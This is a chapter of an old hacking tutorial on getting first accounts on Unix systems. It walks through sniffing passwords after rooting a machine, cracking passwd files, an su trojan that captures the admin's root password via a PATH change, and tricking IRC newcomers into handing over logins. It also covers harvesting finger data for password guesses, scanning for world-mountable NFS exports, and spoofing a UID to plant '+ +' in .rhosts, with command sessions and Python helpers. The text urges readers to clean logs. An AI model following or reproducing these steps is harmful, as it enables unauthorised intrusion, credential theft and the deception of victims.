Chapter II - Getting started (your first account)

There are many ways to get a starter account. I will go into each area to help you get started. All you need is one good account to spawn off to hundreds of accounts. Think of this: you get one good exploitable system, most any Linux machine ;)

Now you get root access and load a sniffer program. The TCP sniffer will watch for any login on the network and log the login and password of any telnet, ftp, or dial-in session going out of or coming into the system. This works because those protocols send the password in the clear, so anything on the same segment can read it. Now even if it is a small Ethernet segment you have around 100 passwords for a few machines or domains. If it is a larger net provider you have hundreds of accounts all over the world! All you need for this is one good account and password on an exploitable system. If it seems you cannot exploit root on the system, this might be a good system to crack passwords on, and exchange the accounts for other accounts from hackers or IRC users who are looking to load a bot but do not have the shell account or disk space to do it. NEVER give out even one password to a system you exploited root on. Keep these systems to yourself!

Let's now get into ways to get your first accounts.

Section 2A. - Cracking passwd files

If you are hacking with the right frame of mind, you will run the crack program only until you get one good account that will let you into the system. You will log in and see if you can exploit root on the system. If so, get root, get the files you need into your nested directory, erase your presence, and clean all of the logs. Now you are ready to load your sniffer. Why go on cracking passwords for a system that within 24 hours will have given you most of the passwords anyway? Not only for the machine you just hacked, but for the other machines it was connected to as well. If the system is not exploitable, don't waste your time on it; go on to the next. At a later date, if you want to crack passwords for accounts to trade, go ahead.

If you get an admin's account cracked you might want to read his history files and see if he is using the su command to access root a lot. If he is, you can use an su trojan on him. This will get you the root password. It works like this: you change his shell startup script so that a hidden directory (.term is a good choice) is placed in the search path before all other directories. You put a fake su binary in the .term (or other) directory. He types su, everything looks normal to him, he types in the root password when prompted, the password is copied to a log file in /tmp/.elm69, the trojan deletes its own su file, and it returns a password error telling him to try again. He thinks he must have mistyped and runs su again, but this time the real one runs and he logs in. The trick depends entirely on PATH order: the shell runs the first su it finds, and a directory the user can write to has been put ahead of /bin.

You will find this fake su program in the last appendix, named uuencoded files. Here are the docs:

Fake SU by Nfin8 - i-e
IRC: /msg i-e

Easy as 1,2,3 ...

1. Change the path in one of the user accounts that you have access to, one that you see is using SU from reading their history files, to hit a path first that you have placed the su trojan file into. .term or .elm is good!

2. Make sure to edit the top of the su.c file to the path you will be using so that the su trojan will delete itself and let the real SU work for the second try.

3. Put all of the files in the target directory and compile the su.c file:

gcc su.c -o su

Then delete all of the files but the su. All done!

.bash_profile might look like this:

# .bash_profile

# Get the aliases and functions
if [ -f ~/.bashrc ]; then
        . ~/.bashrc
fi

# User specific environment and startup programs

PATH=$PATH:$HOME/bin
ENV=$HOME/.bashrc
USERNAME=""

export USERNAME ENV PATH

You change the PATH line to: PATH=$HOME/.term:$PATH:$HOME/bin

When the sysadmin runs 'su' it will run the su trojan in the .term directory first and report that the password he typed was wrong. The trojan su program will have put a hidden file in the /tmp directory for you that contains the root password (or account password) typed. If it was an account rather than the root password, it will let you know the account name. Then the trojan su program deletes itself so that the next try gets the real su program.
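The whole su trick rests on one condition: a directory the victim can write to comes before /bin in his PATH. Here is an added example (written for this page, not code from the original text or from the fake su package) that expands a .bash_profile PATH line the way the shell would and flags entries that are searched before the system bin directories and that the user can populate. The environment values and PATH lines in it are constructed; the list of system directories is an assumption about a typical Linux/SunOS layout.

```python
"""Audit a shell PATH for the search-order weakness the su trojan relies on.

Added example; this is not code from the original text or from the fake su
package it describes. It expands a PATH assignment the way the shell would,
then flags entries that are searched before the system bin directories and
that the user can populate (anything under $HOME, an empty entry, '.', or a
relative path). A binary planted in such a directory shadows the real one for
every command name, which is exactly how the .term trick captures the root
password. The environment and the PATH lines below are constructed.
"""
import re
from dataclasses import dataclass

# Where the real su, passwd, login, etc. live (assumption: a typical
# Linux/SunOS layout; adjust for the target).
SYSTEM_BIN = ("/bin", "/usr/bin", "/sbin", "/usr/sbin")


@dataclass
class Finding:
    index: int      # position in PATH (0 = searched first)
    entry: str      # the offending PATH entry
    reason: str


def expand_path_assignment(assignment: str, env: dict[str, str]) -> str:
    """Expand a line such as 'PATH=$HOME/.term:$PATH:$HOME/bin' against env.

    Only plain $VAR / ${VAR} references are handled, which is all a startup
    file like the .bash_profile above normally uses.
    """
    _, _, value = assignment.strip().partition("=")
    return re.sub(r"\$\{?(\w+)\}?", lambda m: env.get(m.group(1), ""), value)


def audit_path(path: str, home: str) -> list[Finding]:
    """Return PATH entries an attacker could use to shadow system binaries."""
    entries = path.split(":")
    # Anything at or after the first system directory cannot shadow /bin/su.
    first_system = next(
        (i for i, e in enumerate(entries) if e in SYSTEM_BIN), len(entries)
    )
    home_prefix = home.rstrip("/") + "/"
    findings: list[Finding] = []
    for i, entry in enumerate(entries):
        shadows = i < first_system
        tail = "; precedes system bin dirs" if shadows else ""
        if entry in ("", "."):
            findings.append(Finding(i, entry, "searches the current directory" + tail))
        elif not entry.startswith("/"):
            findings.append(Finding(i, entry, "relative entry, resolved against the current directory" + tail))
        elif shadows and entry.startswith(home_prefix):
            hidden = entry[len(home_prefix):].startswith(".")
            findings.append(Finding(
                i, entry,
                "user-writable directory under $HOME searched before system bin dirs"
                + (" (hidden dot-directory)" if hidden else "")
                + "; a planted 'su' here runs instead of the real one"))
    return findings


def audit_profile_line(assignment: str, env: dict[str, str]) -> list[Finding]:
    """Expand the profile's PATH line, then audit the result."""
    return audit_path(expand_path_assignment(assignment, env), env["HOME"])


if __name__ == "__main__":
    # Constructed environment for an admin account.
    env = {"HOME": "/home/admin", "PATH": "/usr/local/bin:/bin:/usr/bin"}
    for line in ("PATH=$PATH:$HOME/bin",                 # the stock .bash_profile line
                 "PATH=$HOME/.term:$PATH:$HOME/bin"):    # the trojaned line
        findings = audit_profile_line(line, env)
        print(line, "->", "clean" if not findings else "")
        for f in findings:
            print(f"  [{f.index}] {f.entry!r}: {f.reason}")
```

Run against the stock line it reports nothing, because $HOME/bin comes after /bin and /usr/bin; run against the trojaned line it flags /home/admin/.term at position 0 as a hidden, user-writable directory searched before the system ones. The same check applied to an admin's startup files is what catches this trick from the defender's side.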

 

You can find the admins at the top section of the passwd file in the /etc directory. Just type: more passwd

You can be fairly sure that the first two real accounts made in the passwd file are admins; also sometimes you can find others by where their home directories are located in the passwd file, like /staff/username.

The history files are in each user's home directory. You can read these to see what the last commands were that were typed by the user, sometimes as much as the last 100+ commands. Look for the file .bash_history (bash) or .history (csh/tcsh); you can read these using more. Command: more .bash_history, or most times to save your typing you can type: more .b* (or) just type: more .b (and then hit the tab key on your keyboard).

Ok, so now you need a good password cracking program. You can see in the next chapter how to get password files from systems that you do not have an account on, but it is a catch-22: you need the password cracking program too. There are three things that you will need.

1. Password cracking program
2. Good word files
3. Password files

The best password cracking program to start with would be Cracker Jack. You can search the web and find this easy as 1,2,3. Download it and you are ready to go. If you are a bit more advanced you can download a cjack for unix and run it in a shell. But if you are just getting started get the DOS/OS/2 version.

Also search for some good word files. The best word files are names. You will find that most insecure passwords out there are guys' girlfriends' names, or girls' boyfriends' names ;) You will find word files like 'familynames', 'babynames', 'girlsnames', 'boysnames', 'commonpasswords', 'hackersdict' and others like these to be the best.

Load Cracker Jack like this:

[D:\jack]jack

Cracker Jack version 1.4 for OS/2 and DOS (386)
Copyright (C) 1993, The Jackal, Denmark

PWfile(s) : domain.com.passwd
Wordfile  : domain.com.passwd

Like above, run the password file as the wordfile first. This will get you all of the logins that used their login name as their password; also if they used any other info from the passwd file, like their real name or company name, it will hit right away and you will not have to wait for the program to search through a word file. (Cracker Jack works the only way a crypt(3) cracker can: it encrypts each candidate word with each account's salt and compares the result to the hash stored in the passwd file, so a small, well-chosen word list finishes fast.)

If you want to hash the word file to get more out of it you can read the docs for Cracker Jack. 'Hashing' in Cracker Jack's terminology has nothing to do with the crypt hashes in the passwd file; it is word mangling, where you tell Cracker Jack to change the case of the words in the wordfile or even add numbers or letters to the beginning or end of them, like sandy1 or 1sandy. You will find that many users do this and think they are more secure.

Here are hashing files for both the passwd file and your word list. After looking these over you will see how you can modify these or create new ones to suit your needs.

DictHash.bat
JackHash.bat

You can get password files without an account, see next chapter.
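To make the two tricks above concrete (the passwd file as its own wordlist, and 'hashing' in the Cracker Jack sense of mangling), here is an added example in Python, written for this page; it is not Cracker Jack and not the DictHash.bat/JackHash.bat files referred to above. It harvests login names and GECOS tokens from passwd-format lines, then mangles every word with case variants and a single leading or trailing digit. SAMPLE_PASSWD is constructed and the accounts in it are made up. The output is a word list you would feed to a cracker; the cracking itself (crypt(3) of each candidate with each account's salt) is left to the tool.

```python
"""Dictionary generation in the style of Cracker Jack's "hashing" (word mangling).

Added example, written for this page; it is not Cracker Jack and not the
DictHash.bat/JackHash.bat files referred to in the text. It shows the two
tricks the section describes: (1) harvesting the passwd file itself as a
wordlist (login names, GECOS name fields, office tokens), and (2) mangling
each word with case changes and a leading or trailing digit so that sandy1
and 1sandy fall out of sandy. SAMPLE_PASSWD is constructed; the logins and
names are made up.
"""
import re

SAMPLE_PASSWD = """\
root:x:0:0:System Administrator:/root:/bin/csh
sandy:x:501:100:Sandy Smith:/home/sandy:/bin/bash
chris:x:502:100:Chris Myers,Sales,x123:/home/chris:/bin/csh
ftp:x:14:50:FTP User:/var/ftp:/bin/false
"""


def _dedupe(items):
    """Drop repeats while keeping first-seen order (order matters: quick wins first)."""
    seen = set()
    out = []
    for it in items:
        if it not in seen:
            seen.add(it)
            out.append(it)
    return out


def words_from_passwd(passwd_text: str) -> list[str]:
    """Harvest candidate words from /etc/passwd-format lines.

    The GECOS field (5th) is comma separated: full name, office, phone, ...
    Each token becomes a word, and the full name is also emitted with the
    spaces removed ("chrismyers"), which is the form users actually type.
    """
    words: list[str] = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 7 or not fields[0]:
            continue
        login, gecos = fields[0], fields[4]
        words.append(login)
        for token in re.split(r"[ ,]+", gecos):
            if token:
                words.append(token.lower())
        full_name = gecos.split(",")[0].replace(" ", "")
        if full_name:
            words.append(full_name.lower())
    return _dedupe(words)


def mangle(word: str, digits: str = "0123456789") -> list[str]:
    """Cracker Jack style rules: case variants plus one digit prefixed or appended.

    Only single digits are used here (10 + 10 per case variant); appending
    letters or two-digit years is the same loop with a different alphabet.
    """
    cases = _dedupe([word.lower(), word.capitalize(), word.upper()])
    variants = list(cases)
    for base in cases:
        for d in digits:
            variants.append(base + d)
            variants.append(d + base)
    return _dedupe(variants)


def candidate_list(words: list[str]) -> list[str]:
    """Plain words first (they crack in seconds), then the mangled forms."""
    out = list(words)
    for w in words:
        out.extend(mangle(w))
    return _dedupe(out)


if __name__ == "__main__":
    words = words_from_passwd(SAMPLE_PASSWD)
    print(len(words), "seed words:", words)
    cands = candidate_list(words)
    print(len(cands), "candidates; sandy variants:",
          [c for c in cands if c.lower().startswith("sandy")][:8])
```

The seed words come out in the order the tool should try them (login, then name tokens, then the joined name), and the mangled forms follow, so the fast hits land first just as the text recommends.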

Section 2B. - Talking to newbies

There are other ways to get an account without doing much work. Park yourself on an IRC channel that you made with a title about hacking. Also try joining other channels already on IRC. Channels would include:

#hacking #unix #unixhacking #hack #hackers #hacker #virus #virii #hackers_hideout or any others you can find.

Now what you are looking for are newbies looking to learn or to exploit the shell they are on already. There is always someone out there that does not know as much as you. Watch for someone out there who asks a newbie question and gets no answer, or even gets kicked off the channel. Here is your mark ;)

/msg him so that others can't see that you are talking to him, and begin to ask him questions, try to help him, but not too much ;) Finally tell him that you can log in for him and do it. This could be to snatch the passwd file or god knows what. Promise him the world and get that login and password. Now you have a start and can begin your hands-on learning process. If you get root on the system you might not want to expose that to him, but you can feed him other goodies that will keep him busy while you sniff some other passwords on the system.

So now if there are some out there that remember i-e when you gave him your login and password, you can be sure that the above never happened <G>rin ... I tend to like to help people learn, so I am telling the truth when I say I have dealt honestly with most everyone I have come across.

Section 2C. - The hard way

There is another way you can do this. You can be sure that on most big systems some users do not use secure passwords. From a shell do this:

finger @domainname.com

Watch, I will do a real domain:

[10:35am][/home/ii]finger @starnet.net
[starnet.net]
Login    Name                  Tty  Idle  Login Time    Office  Office Phone
chris    Chris Myers           p2   4:46  Jan 27 11:19
mike     Mike Suter            p1   4:57  Jan 22 16:14
mike     Mike Suter            p5   3d    Jan 16 15:35
root     System Administrator  p3   4:59  Jan 16 10:17
wendt    Catherine Wendt-Bern  p0   3     Jan 21 14:49
[10:35am][/home/ii]

Now we might want to try logging in later, so log this information:

Login chris, password try: Chris, chris, myers, Myers, chrismyers, etc...

This one looks good: wendt:Catherine:catherine

Here is another command:

[10:35am][/home/ii]finger -l @starnet.net
[starnet.net]

Login: mike                             Name: Mike Suter
Directory: /usra/staff/mike             Shell: /bin/csh
On since Wed Jan 22 16:14 (CST) on ttyp1, idle 5:26, from mikesbox.starnet.net
On since Thu Jan 16 15:35 (CST) on ttyp5, idle 3 days 22:00, from mikesbox
Last login Sun Jan 26 23:07 (CST) on ttyp2 from hurk
No Plan.

Login: root                             Name: System Administrator
Directory: /root                        Shell: /bin/csh
On since Thu Jan 16 10:17 (CST) on ttyp3, idle 5:28, from mikesbox.starnet.net
Last login Thu Jan 16 18:07 (CST) on ttyp6 from mikesbox.starnet.net
Mail forwarded to:
[email protected]
#[email protected], [email protected]
No Plan.

Login: wendt                            Name: Catherine Wendt-Bernal
Directory: /usra/staff/wendt            Shell: /bin/csh
On since Tue Jan 21 14:49 (CST) on ttyp0, idle 0:02, from veggedout
No Plan.

You get more info to play with ;)
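Doing by hand what the text does for chris/Chris Myers gets old quickly, so here is an added example (written for this page, not part of the original text) that parses finger -l output of the form shown above into records and produces, for each account, the login and name-based guesses in lower-case and Capitalised form plus the full name run together. It also collects the hosts users are logged in from, and the address root's mail is forwarded to, which usually names the real admin. SAMPLE_FINGER is constructed; the logins, names and hostnames in it are made up.

```python
"""Parse `finger -l @host` output into per-account password guesses and pivot hosts.

Added example, not part of the original text. It reads the -l style output
shown above (Login:/Name: pairs, Directory:/Shell:, 'On since ... from host'
and 'Last login ... from host' lines, 'Mail forwarded to:' addresses) into
records, then derives the guesses the text suggests for each account: the
login, each part of the real name and the name run together, in lower-case
and Capitalised forms. SAMPLE_FINGER is constructed; names are made up.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

SAMPLE_FINGER = """\
[example.net]

Login: jdoe                             Name: Jane Doe
Directory: /usra/staff/jdoe             Shell: /bin/csh
On since Wed Jan 22 16:14 (CST) on ttyp1, idle 5:26, from jdoe-box.example.net
Last login Sun Jan 26 23:07 (CST) on ttyp2 from lab-pc
No Plan.

Login: root                             Name: System Administrator
Directory: /root                        Shell: /bin/csh
On since Thu Jan 16 10:17 (CST) on ttyp3, idle 5:28, from jdoe-box.example.net
Mail forwarded to:
jdoe@example.net
No Plan.

Login: mwb                              Name: Mary Wendt-Bernal
Directory: /usra/staff/mwb              Shell: /bin/csh
On since Tue Jan 21 14:49 (CST) on ttyp0, idle 0:02, from veggedout
No Plan.
"""

LOGIN_RE = re.compile(r"^Login:\s*(\S+)\s+Name:\s*(.*?)\s*$")
DIR_RE = re.compile(r"^Directory:\s*(\S+)\s+Shell:\s*(\S+)")
FROM_RE = re.compile(r"\bfrom\s+(\S+)\s*$")
MAIL_RE = re.compile(r"[\w.+-]+@[\w.-]+")


@dataclass
class FingerUser:
    login: str
    name: str
    directory: str = ""
    shell: str = ""
    hosts: list[str] = field(default_factory=list)     # where the user logs in from
    mail_to: list[str] = field(default_factory=list)   # "Mail forwarded to:" addresses


def _dedupe(items):
    seen, out = set(), []
    for it in items:
        if it not in seen:
            seen.add(it)
            out.append(it)
    return out


def parse_finger(text: str) -> list[FingerUser]:
    users: list[FingerUser] = []
    cur: FingerUser | None = None
    for line in text.splitlines():
        m = LOGIN_RE.match(line)
        if m:
            cur = FingerUser(login=m.group(1), name=m.group(2))
            users.append(cur)
            continue
        if cur is None:
            continue                      # banner lines such as [example.net]
        m = DIR_RE.match(line)
        if m:
            cur.directory, cur.shell = m.group(1), m.group(2)
            continue
        m = FROM_RE.search(line)
        if m:
            if m.group(1) not in cur.hosts:
                cur.hosts.append(m.group(1))
            continue
        if "@" in line:
            cur.mail_to.extend(MAIL_RE.findall(line))
    return users


def name_guesses(user: FingerUser) -> list[str]:
    """The guess list the text gives for chris / Chris Myers, generalised.

    Login and each name part (split on spaces and hyphens) in lower-case and
    Capitalised form, then the whole name run together in lower-case.
    """
    parts = [p for p in re.split(r"[\s\-]+", user.name) if p]
    guesses = [user.login, user.login.capitalize()]
    for p in parts:
        guesses += [p.lower(), p.capitalize()]
    if len(parts) > 1:
        guesses.append("".join(parts).lower())
    return _dedupe(guesses)


def pivot_hosts(users: list[FingerUser]) -> list[str]:
    """Hosts users log in from: their workstations, the next thing to look at."""
    return sorted({h for u in users for h in u.hosts})


def likely_admins(users: list[FingerUser]) -> list[str]:
    """Logins that root's mail is forwarded to are almost always the admins."""
    root = next((u for u in users if u.login == "root"), None)
    return [] if root is None else [addr.split("@", 1)[0] for addr in root.mail_to]


if __name__ == "__main__":
    users = parse_finger(SAMPLE_FINGER)
    for u in users:
        print(f"{u.login:8s} {u.shell:10s} from {u.hosts} -> {name_guesses(u)}")
    print("pivot hosts:", pivot_hosts(users))
    print("likely admins:", likely_admins(users))
```

The guess list is deliberately short and ordered; it is meant to be tried a few times per account, not brute forced, because as the text notes below every attempt is logged.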

 

I know this can make you tired ....

Remember this stuff will log your tries, so if you get on and get root, clean

the logs ;)

Here is a small .c file you can use if you get on.

pop3hack.c

You could also write a small perl script that will finger @ each domain from a domain list and cat the response to a file, then when done go back and try to log in to the pop3 daemon using username/username (or other info) as the login and password, putting the response into another file for you.

You can ftp to rs.internic.net; in the domain directory you will find:

com.zone.gz
edu.zone.gz
gov.zone.gz
mil.zone.gz
net.zone.gz
org.zone.gz

Download these files, gunzip them, and run getdomain.pl (script below) on the domains you want to target first, in this manner:

perl getdomain.pl com.zone com >com.all

What this will do is rip all of the .COM domains out of the zone file and put them into a file called com.all.

If you wanted to do all of the .EDU addresses you would type:

perl getdomain.pl edu.zone edu >edu.all

Now you will have a list to use with your probe called edu.all.

Here is the perl script:

getdomain.pl

To use the script above all you need to do is copy between the lines above and name it getdomain.pl, then copy it onto the unix system and type:

chmod +x getdomain.pl

Now it is ready to run with the command lines above.

Section 2D. - Using mount to gain access to unix systems

This is not hard to do and there are many systems out there that are mountable. mount is a command in unix that will allow you to attach remote machines' drives to yours. This is done so you can do installs from other machines, or just share drives or directories across the network. The problem is that many admins are not good with unix commands or setup. Or maybe they are just plain lazy and export the drives with world access, not understanding that the world can mount the drive and gain write access to their users' directories.

What you will need to get started here is a hacked root account. To be able to mount the remote drive and gain access to a user's files you will need to modify your own system's password file and use the su command: NFS with the default AUTH_SYS authentication trusts whatever numeric UID the client presents, so becoming that UID locally is the same as being that user on the export.

Ok, let's say we have root access. Let's get started!

You can see if another system has mountable drives by using the showmount command.

From the root account:

$root> showmount -e wwa.com
mount clntudp_create: RPC: Port mapper failure - RPC: Unable to receive

Ok, no problem, this domain will not work (no reachable portmapper, so there is no NFS to talk to), go on to the next one...

$root> showmount -e seva.net
Export list for seva.net:
/var/mail                                         pluto.seva.net
/home/user1                                       pluto.seva.net
/usr/local                                        pluto.seva.net,rover.seva.net
/export/X11R6.3                                   rover.seva.net
/export/rover                                     rover.seva.net,pluto.seva.net
/export/ftp/linux-archive/redhat-4.1/i386/RedHat  (everyone)

Notice the (everyone); this would be good if we wanted to install linux from this guy's box, but we want open directories to users.... so go on to the next one...

$root> showmount -e XXXXX.XXX < this one worked ... find your own ;)
Export list for XXXXX.XXX:
/export/home (everyone)

Now this guy exported his home directory tree; the user accounts are under the home directory ;) and look above ... (everyone) can mount it!

 

Ok, this section was to show you how to see if they are mountable; in the next section I will show you how to mount and hack it. But for now, here is a script that will scan every domain on the internet that is mountable and log them for you.

To use this script simply use the domain ripper in the PHF section, download the needed files from rs.internic.net, rip some domains and name the file 'domains', and start up the script. To make it run in the background put a & after the command, like this: cmount.pl&

How it works:

When you run the file it will go to the domains list and run showmount -e on each domain; if it finds that there is a return on mountable drives it will save the info in the current directory in files named domain.XXX.export. All you have to do is view the files and mount the drives!

cmount.pl

Ok, now on to mounting the drives ....

Let's say we did a showmount -e domain.com and got back:

Export list for domain.com:
/                    (everyone)
/p1                  (everyone)
/p2                  (everyone)
/p3                  (everyone)
/p5                  (everyone)
/p6                  (everyone)
/p7                  (everyone)
/var/spool/mail      titan,europa,galifrey
/tmp                 (everyone)

We would want to mount / .. yup .... this guy has his entire system mountable!

$root> mkdir /tmp/mount
$root> mount -nt nfs domain.com:/ /tmp/mount

If he had the home directory mountable the command would be:

$root> mount -nt nfs domain.com:/home /tmp/mount

To unmount the system, make sure you are out of the directory and type:

$root> umount /tmp/mount

Make sure you make the mount directory first; you can make this anywhere on the system that you want. If the system's /mnt directory is empty you can use it also. (-t nfs picks the filesystem type; -n tells mount not to record the mount in /etc/mtab.)

Ok this is for real:

bash# ls -al /mnt                                  ; making sure the mnt dir is empty
ls: /mnt: No such file or directory                ; there was not even a dir there ;)
bash# mkdir /mnt                                   ; let's make one for them <g>rin
bash# mount -nt nfs xxxxxx.xxx:/export/usr /mnt    ; let's mount the sucker ...
bash# cd /mnt                                      ; changing to the mounted drive...
bash# ls                                           ; just the plain dir ..
TT_DB      home        raddb              share
back       local       radius-961029.gz   www
exec       lost+found  radius-961029.ps
bash#                                              ; there it is up there, the home dir ... oh good ...
bash# cd home
bash# ls -l                                        ; long directory listing ... tom is looking good here ;)
total 18
drwxr-xr-x   2 judy      other       512 Feb  1 10:41 garry
drwxr-xr-x  69 infobahn  other      5632 Mar 10 01:42 horke
drwxr-xr-x  11 301       other      2048 Mar  1 10:25 jens
drwxr-xr-x   2 300       other       512 Oct 15 07:45 joerg
drwxr-xr-x   2 604       other       512 Feb  8 13:00 mailadmin
drwxr-xr-x   2 melissa   other       512 Sep 27 06:15 mk
drwxr-xr-x   6 news      news        512 Mar  6  1996 news
drwxr-xr-x   2 303       other       512 Jan 24 04:17 norbert
drwxr-xr-x   4 jim       other       512 Sep 27 06:16 pauk
drwxr-xr-x   2 302       other       512 Mar  1 10:10 tom
drwxr-xr-x   5 601       daemon      512 Jan 26  1996 viewx
drwxr-xr-x  10 15        audio       512 Oct 17 08:03 www
bash#  ; notice tom's directory is owned by user number 302, a UID our box has no name for ... hmm, let's put him in our passwd file
bash# pico /etc/passwd
tom:x:302:2::/home:/bin/bash                       ; this should do it ;)
bash# su - tom                                     ; su to the tom account ...
bash$ ls -l
total 18
drwxr-xr-x   2 judy      other       512 Feb  1 10:41 garry
drwxr-xr-x  69 infobahn  other      5632 Mar 10 01:42 horke
drwxr-xr-x  11 301       other      2048 Mar  1 10:25 jens
drwxr-xr-x   2 300       other       512 Oct 15 07:45 joerg
drwxr-xr-x   2 604       other       512 Feb  8 13:00 mailadmin
drwxr-xr-x   2 melissa   other       512 Sep 27 06:15 mk
drwxr-xr-x   6 news      news        512 Mar  6  1996 news
drwxr-xr-x   2 303       other       512 Jan 24 04:17 norbert
drwxr-xr-x   4 jim       other       512 Sep 27 06:16 pauk
drwxr-xr-x   2 tom       other       512 Mar  1 10:10 tom
drwxr-xr-x   5 601       daemon      512 Jan 26  1996 view
drwxr-xr-x  10 15        audio       512 Oct 17 08:03 www
bash$  ; NOTICE above that tom's user number is gone: ls now resolves 302 to 'tom' through our passwd file. Nothing changed on the server, but the NFS server takes our UID 302 at face value, so as far as it is concerned we are tom and we own his dir!

bash$ echo + +>>tom/.rhosts                        ; this will make a file in his dir called .rhosts
bash$  ; inside .rhosts will be the wildcards + +, meaning any user from any host may rlogin to his account without a password
bash$ rlogin xxxxx.xxx                             ; we are tom on our machine, so let's just rlogin plain: rlogin sends our local login name, which his .rhosts now trusts
Last login: Fri Mar 7 00:16:03 from xxxxx.xxxxxxxxxx
Sun Microsystems Inc.   SunOS 5.5       Generic November 1995
>                                                  ; yup we are in!
> ls -al
total 8
drwxr-xr-x   2 tom      group        512 Mar  1 17:10 .
drwxr-xr-x  14 tom      group        512 Jan 24 11:16 ..
-rw-r--r--   1 tom      group        144 Dec 30 15:32 .profile
-rw-r--r--   1 tom      bin            8 Mar 11 08:26 .rhosts
>

So now we have access, so let's just hack this system ... oops, that is another lesson! Have fun!
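Here is an added example (written for this page, not the cmount.pl script referred to above) that does the analysis this section does by eye: it parses showmount -e output of the form shown into (path, clients) records, ranks the (everyone) exports by what they expose (the whole tree, user home directories, or something else), and checks a .rhosts file for the '+ +' wildcard planted in the session above. showmount does not report ro/rw or root_squash, so an (everyone) entry is a lead to confirm, not proof of write access. SAMPLE_SHOWMOUNT and SAMPLE_RHOSTS are constructed from the formats on this page; the hostnames in them are made up.

```python
"""Audit `showmount -e` output and .rhosts contents for the weaknesses used above.

Added example, written for this page; it is not the cmount.pl script the text
refers to. It parses the export list format shown in this section into
(path, clients) records, ranks exports that are open to (everyone) by what
they expose, and checks a .rhosts file for the '+ +' wildcard. showmount does
not report ro/rw or root_squash, so an (everyone) entry is a lead, not proof
of write access. SAMPLE_SHOWMOUNT and SAMPLE_RHOSTS are constructed.
"""
from dataclasses import dataclass

SAMPLE_SHOWMOUNT = """\
Export list for domain.example:
/                                                 (everyone)
/p1                                               (everyone)
/var/spool/mail                                   titan,europa,galifrey
/export/home                                      (everyone)
/export/ftp/linux-archive/redhat-4.1/i386/RedHat  (everyone)
/usr/local                                        pluto.example,rover.example
/tmp                                              (everyone)
"""

SAMPLE_RHOSTS = """\
# hosts trusted by this account
titan.example tom
+ +
"""


@dataclass
class Export:
    path: str
    clients: list[str]

    @property
    def world(self) -> bool:
        """showmount prints '(everyone)' when the export has no host list."""
        return "(everyone)" in self.clients


def parse_showmount(text: str) -> list[Export]:
    exports: list[Export] = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Export list"):
            continue
        # Export paths contain no spaces; everything after the first run of
        # whitespace is the comma separated client list.
        path, _, clients = line.partition(" ")
        exports.append(Export(path, [c.strip() for c in clients.split(",") if c.strip()]))
    return exports


def classify(export: Export) -> str:
    if not export.world:
        return "restricted"   # host list present; still worth checking who is on it
    parts = [p for p in export.path.split("/") if p]
    if not parts:
        return "critical"     # '/' : the whole filesystem, passwd and all
    if "home" in parts:
        return "high"         # user homes: .rhosts/.profile writable under a spoofed UID
    return "world"            # readable by anyone; confirm rw vs ro on the server


def audit_exports(text: str) -> dict[str, list[str]]:
    """Group export paths by severity, preserving showmount's order."""
    groups: dict[str, list[str]] = {"critical": [], "high": [], "world": [], "restricted": []}
    for e in parse_showmount(text):
        groups[classify(e)].append(e.path)
    return groups


def rhosts_findings(text: str) -> list[str]:
    """Flag .rhosts lines that trust any host ('+') or any user ('+')."""
    findings: list[str] = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        host = fields[0]
        user = fields[1] if len(fields) > 1 else None
        if host == "+" and user == "+":
            findings.append(f"line {n}: any user on any host may rlogin without a password")
        elif host == "+":
            findings.append(f"line {n}: any host trusted" + (f" for user {user}" if user else ""))
        elif user == "+":
            findings.append(f"line {n}: any user trusted from {host}")
    return findings


if __name__ == "__main__":
    for level, paths in audit_exports(SAMPLE_SHOWMOUNT).items():
        print(f"{level:10s} {paths}")
    for finding in rhosts_findings(SAMPLE_RHOSTS):
        print(finding)
```

Note what does and does not fix this on the server side. root_squash alone does not help: the session above never uses root on the export, it uses UID 302, and AUTH_SYS NFS believes any UID a client sends. Restricting each export to named hosts (the host lists showmount prints for the 'restricted' group) is what stops an arbitrary Internet host from mounting it, and a .rhosts containing '+ +' should be treated as a compromise indicator wherever it turns up.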
